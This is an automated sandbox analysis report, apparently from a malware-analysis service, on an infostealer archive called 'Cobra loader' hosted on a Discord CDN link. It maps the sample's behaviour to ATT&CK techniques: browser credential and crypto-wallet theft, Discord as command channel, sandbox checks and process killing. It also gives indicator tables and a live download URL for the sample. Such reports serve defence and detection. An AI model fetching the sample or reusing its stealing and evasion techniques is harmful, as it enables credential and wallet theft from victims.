hxxps://cdn[.]discordapp[.]com/attachments/778517571808919565/1243615426152235119/Cobra_loader[.]rar?ex=66521e9e&is=6650cd1e&hm=8b1bc83aed9bd36d7d476586142ac81c48bb6dccaa2e2ad9de6d55873858cf49&

Analysis

max time kernel
824s
max time network
512s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/778517571808919565/1243615426152235119/Cobra_loader.rar?ex=66521e9e&is=6650cd1e&hm=8b1bc83aed9bd36d7d476586142ac81c48bb6dccaa2e2ad9de6d55873858cf49&

Score

8^/10

discovery execution persistence spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3772	powershell.exe
1068	powershell.exe
388	powershell.exe
5452	powershell.exe
5844	powershell.exe
3800	powershell.exe
628	powershell.exe
5712	powershell.exe
4292	powershell.exe
3600	powershell.exe
4752	powershell.exe
3132	powershell.exe
5652	powershell.exe
5380	powershell.exe
4532	powershell.exe
5524	powershell.exe
4952	powershell.exe
1012	powershell.exe

Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

7zFM.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation 7zFM.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	7zFM.exe

Executes dropped EXE 26 IoCs

Processes:

winrar-x64-701.exewinrar-x64-701.exewinrar-x64-701.exe7z2405-x64.exe7z2405-x64.exe7zFM.exeCobra loader.exeCobra loader.exerar.exeCobra loader.exeCobra loader.exerar.exeCobra loader.exeCobra loader.exeCobra loader.exeCobra loader.exerar.exeCobra loader.exeCobra loader.exerar.exeCobra loader.exeCobra loader.exerar.exeCobra loader.exeCobra loader.exerar.exe

pid	process
5256	winrar-x64-701.exe
2332	winrar-x64-701.exe
3424	winrar-x64-701.exe
5104	7z2405-x64.exe
640	7z2405-x64.exe
5020	7zFM.exe
5796	Cobra loader.exe
1484	Cobra loader.exe
5468	rar.exe
5184	Cobra loader.exe
5800	Cobra loader.exe
5228	rar.exe
4748	Cobra loader.exe
3436	Cobra loader.exe
4424	Cobra loader.exe
2432	Cobra loader.exe
5468	rar.exe
5652	Cobra loader.exe
5684	Cobra loader.exe
3780	rar.exe
2496	Cobra loader.exe
5800	Cobra loader.exe
5520	rar.exe
4312	Cobra loader.exe
3992	Cobra loader.exe
2852	rar.exe

Loads dropped DLL 64 IoCs

Processes:

taskmgr.exe7zFM.exeCobra loader.exeCobra loader.exeCobra loader.exeCobra loader.exe

pid	process
544	taskmgr.exe
5020	7zFM.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
1484	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
5800	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
3436	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe
2432	Cobra loader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

7z2405-x64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2405-x64.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI57962\python311.dll	upx
behavioral1/memory/1484-1073-0x00007FFCD7160000-0x00007FFCD774A000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI57962\_ctypes.pyd	upx
behavioral1/memory/1484-1077-0x00007FFCF30F0000-0x00007FFCF3113000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI57962\libffi-8.dll	upx
behavioral1/memory/1484-1087-0x00007FFCF4360000-0x00007FFCF436F000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI57962\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI57962\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI57962\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI57962\libcrypto-1_1.dll	upx
behavioral1/memory/1484-1092-0x00007FFCF30C0000-0x00007FFCF30ED000-memory.dmp	upx
behavioral1/memory/1484-1093-0x00007FFCF30A0000-0x00007FFCF30B9000-memory.dmp	upx
behavioral1/memory/1484-1094-0x00007FFCF3070000-0x00007FFCF3093000-memory.dmp	upx
behavioral1/memory/1484-1095-0x00007FFCDA570000-0x00007FFCDA6DF000-memory.dmp	upx
behavioral1/memory/1484-1097-0x00007FFCF3040000-0x00007FFCF304D000-memory.dmp	upx
behavioral1/memory/1484-1096-0x00007FFCF3050000-0x00007FFCF3069000-memory.dmp	upx
behavioral1/memory/1484-1098-0x00007FFCF3010000-0x00007FFCF303E000-memory.dmp	upx
behavioral1/memory/1484-1100-0x00007FFCEF530000-0x00007FFCEF5E8000-memory.dmp	upx
behavioral1/memory/1484-1099-0x00007FFCD7160000-0x00007FFCD774A000-memory.dmp	upx
behavioral1/memory/1484-1101-0x00007FFCDA000000-0x00007FFCDA375000-memory.dmp	upx
behavioral1/memory/1484-1103-0x00007FFCF30F0000-0x00007FFCF3113000-memory.dmp	upx
behavioral1/memory/1484-1104-0x00007FFCF2FF0000-0x00007FFCF3004000-memory.dmp	upx
behavioral1/memory/1484-1105-0x00007FFCF1910000-0x00007FFCF191D000-memory.dmp	upx
behavioral1/memory/1484-1108-0x00007FFCD9EE0000-0x00007FFCD9FFC000-memory.dmp	upx
behavioral1/memory/1484-1276-0x00007FFCF3070000-0x00007FFCF3093000-memory.dmp	upx
behavioral1/memory/1484-1277-0x00007FFCDA570000-0x00007FFCDA6DF000-memory.dmp	upx
behavioral1/memory/1484-1299-0x00007FFCF30F0000-0x00007FFCF3113000-memory.dmp	upx
behavioral1/memory/1484-1313-0x00007FFCF3050000-0x00007FFCF3069000-memory.dmp	upx
behavioral1/memory/1484-1312-0x00007FFCD9EE0000-0x00007FFCD9FFC000-memory.dmp	upx
behavioral1/memory/1484-1310-0x00007FFCF2FF0000-0x00007FFCF3004000-memory.dmp	upx
behavioral1/memory/1484-1309-0x00007FFCDA000000-0x00007FFCDA375000-memory.dmp	upx
behavioral1/memory/1484-1308-0x00007FFCEF530000-0x00007FFCEF5E8000-memory.dmp	upx
behavioral1/memory/1484-1307-0x00007FFCF3010000-0x00007FFCF303E000-memory.dmp	upx
behavioral1/memory/1484-1304-0x00007FFCDA570000-0x00007FFCDA6DF000-memory.dmp	upx
behavioral1/memory/1484-1298-0x00007FFCD7160000-0x00007FFCD774A000-memory.dmp	upx
behavioral1/memory/1484-1327-0x00007FFCF1910000-0x00007FFCF191D000-memory.dmp	upx
behavioral1/memory/1484-1336-0x00007FFCF3050000-0x00007FFCF3069000-memory.dmp	upx
behavioral1/memory/1484-1335-0x00007FFCF3040000-0x00007FFCF304D000-memory.dmp	upx
behavioral1/memory/1484-1334-0x00007FFCF3070000-0x00007FFCF3093000-memory.dmp	upx
behavioral1/memory/1484-1333-0x00007FFCF30A0000-0x00007FFCF30B9000-memory.dmp	upx
behavioral1/memory/1484-1332-0x00007FFCF30C0000-0x00007FFCF30ED000-memory.dmp	upx
behavioral1/memory/1484-1331-0x00007FFCF4360000-0x00007FFCF436F000-memory.dmp	upx
behavioral1/memory/1484-1330-0x00007FFCF30F0000-0x00007FFCF3113000-memory.dmp	upx
behavioral1/memory/1484-1329-0x00007FFCD7160000-0x00007FFCD774A000-memory.dmp	upx
behavioral1/memory/1484-1328-0x00007FFCD9EE0000-0x00007FFCD9FFC000-memory.dmp	upx
behavioral1/memory/1484-1325-0x00007FFCDA000000-0x00007FFCDA375000-memory.dmp	upx
behavioral1/memory/1484-1324-0x00007FFCEF530000-0x00007FFCEF5E8000-memory.dmp	upx
behavioral1/memory/1484-1320-0x00007FFCDA570000-0x00007FFCDA6DF000-memory.dmp	upx
behavioral1/memory/1484-1326-0x00007FFCF2FF0000-0x00007FFCF3004000-memory.dmp	upx
behavioral1/memory/1484-1323-0x00007FFCF3010000-0x00007FFCF303E000-memory.dmp	upx
behavioral1/memory/5800-1379-0x00007FFCDB560000-0x00007FFCDBB4A000-memory.dmp	upx
behavioral1/memory/5800-1381-0x00007FFCF4360000-0x00007FFCF436F000-memory.dmp	upx
behavioral1/memory/5800-1380-0x00007FFCF30F0000-0x00007FFCF3113000-memory.dmp	upx
behavioral1/memory/5800-1386-0x00007FFCF30C0000-0x00007FFCF30ED000-memory.dmp	upx
behavioral1/memory/5800-1387-0x00007FFCF30A0000-0x00007FFCF30B9000-memory.dmp	upx
behavioral1/memory/5800-1389-0x00007FFCDBCC0000-0x00007FFCDBE2F000-memory.dmp	upx
behavioral1/memory/5800-1388-0x00007FFCF3070000-0x00007FFCF3093000-memory.dmp	upx
behavioral1/memory/5800-1391-0x00007FFCF3040000-0x00007FFCF304D000-memory.dmp	upx
behavioral1/memory/5800-1390-0x00007FFCF3050000-0x00007FFCF3069000-memory.dmp	upx
behavioral1/memory/5800-1392-0x00007FFCDB4A0000-0x00007FFCDB558000-memory.dmp	upx
behavioral1/memory/5800-1394-0x00007FFCDB120000-0x00007FFCDB495000-memory.dmp	upx
behavioral1/memory/5800-1400-0x00007FFCF1910000-0x00007FFCF191D000-memory.dmp	upx
behavioral1/memory/5800-1399-0x00007FFCDB000000-0x00007FFCDB11C000-memory.dmp	upx
behavioral1/memory/5800-1398-0x00007FFCF2FF0000-0x00007FFCF3004000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

136 discord.com
141 discord.com
144 discord.com
161 discord.com
227 discord.com
231 discord.com
135 discord.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

133 ip-api.com
159 ip-api.com
225 ip-api.com

flow	ioc
136	discord.com
141	discord.com
144	discord.com
161	discord.com
227	discord.com
231	discord.com
135	discord.com

flow	ioc
133	ip-api.com
159	ip-api.com
225	ip-api.com

Drops file in System32 directory 11 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe

Drops file in Program Files directory 64 IoCs

Processes:

7z2405-x64.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\br.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.dll	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uk.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\az.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spl.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku-ckb.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\af.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\et.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\he.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\io.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lt.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.dll.tmp	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sk.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ro.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kaa.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mr.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lv.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\7-zip.chm	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gl.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ja.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tk.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng2.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ms.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\da.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ky.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tg.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\yo.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cy.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hy.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ast.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ca.txt	7z2405-x64.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ext.txt	7z2405-x64.exe

Drops file in Windows directory 1 IoCs

Processes:

mspaint.exe

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 6 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

3924 WMIC.exe
404 WMIC.exe
2332 WMIC.exe
5704 WMIC.exe
972 WMIC.exe
1752 WMIC.exe

pid	process
3924	WMIC.exe
404	WMIC.exe
2332	WMIC.exe
5704	WMIC.exe
972	WMIC.exe
1752	WMIC.exe

Enumerates processes with tasklist 1 TTPs 18 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
4420	tasklist.exe
1056	tasklist.exe
2404	tasklist.exe
3704	tasklist.exe
4296	tasklist.exe
4888	tasklist.exe
6000	tasklist.exe
4936	tasklist.exe
2700	tasklist.exe
5484	tasklist.exe
6020	tasklist.exe
5732	tasklist.exe
5308	tasklist.exe
6108	tasklist.exe
540	tasklist.exe
2492	tasklist.exe
544	tasklist.exe
620	tasklist.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exeEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Gathers system information 1 TTPs 6 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exesysteminfo.exe

pid process

2660 systeminfo.exe
1368 systeminfo.exe
1256 systeminfo.exe
3744 systeminfo.exe
3564 systeminfo.exe
2924 systeminfo.exe

pid	process
2660	systeminfo.exe
1368	systeminfo.exe
1256	systeminfo.exe
3744	systeminfo.exe
3564	systeminfo.exe
2924	systeminfo.exe

Kills process with taskkill 21 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6000	taskkill.exe
5472	taskkill.exe
5192	taskkill.exe
6076	taskkill.exe
4668	taskkill.exe
4520	taskkill.exe
3536	taskkill.exe
5728	taskkill.exe
4352	taskkill.exe
4668	taskkill.exe
3276	taskkill.exe
5416	taskkill.exe
5380	taskkill.exe
3240	taskkill.exe
4148	taskkill.exe
5652	taskkill.exe
5220	taskkill.exe
5464	taskkill.exe
5128	taskkill.exe
4636	taskkill.exe
1172	taskkill.exe

Modifies registry class 29 IoCs

Processes:

msedge.exeOpenWith.exe7z2405-x64.exeOpenWith.exemspaint.exeOpenWith.exe7z2405-x64.exeOpenWith.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{AA626E42-B923-4471-9A08-5FA24DB3AB98}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip	7z2405-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2405-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll"	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment"	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2405-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2405-x64.exe
Key created	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}	7z2405-x64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension"	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip	7z2405-x64.exe
